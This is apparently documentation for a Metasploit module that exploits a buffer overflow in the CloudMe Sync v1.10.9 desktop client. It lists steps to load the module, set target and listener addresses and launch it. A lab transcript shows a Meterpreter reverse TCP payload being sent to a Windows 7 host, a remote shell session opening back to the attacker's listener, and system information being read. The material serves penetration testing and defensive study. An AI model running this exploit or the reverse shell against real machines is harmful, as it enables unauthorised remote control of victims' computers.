## Description This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe). ## Verification Steps 1. Install CloudMe for Desktop version `v1.10.9` 2. Start the applicaton (you don't need to create an account) 3. Start `msfconsole` 4. Do `use exploit/windows/misc/cloudme_sync` 5. Do `set RHOST ip` 6. Do `set LHOST ip` 7. Do `exploit` 8. Verify the Meterpreter session is opened ## Scenarios ### CloudMe Sync client application on Windows 7 SP1 x86 ``` msf > use exploit/windows/misc/cloudme_sync msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148 RHOST => 172.16.40.148 msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 LHOST => 172.16.40.5 msf exploit(windows/misc/cloudme_sync) > exploit [*] Started reverse TCP handler on 172.16.40.5:4444 [*] Sending stage (179779 bytes) to 172.16.40.148 [*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000 meterpreter > sysinfo Computer : PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : pt_PT Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > ```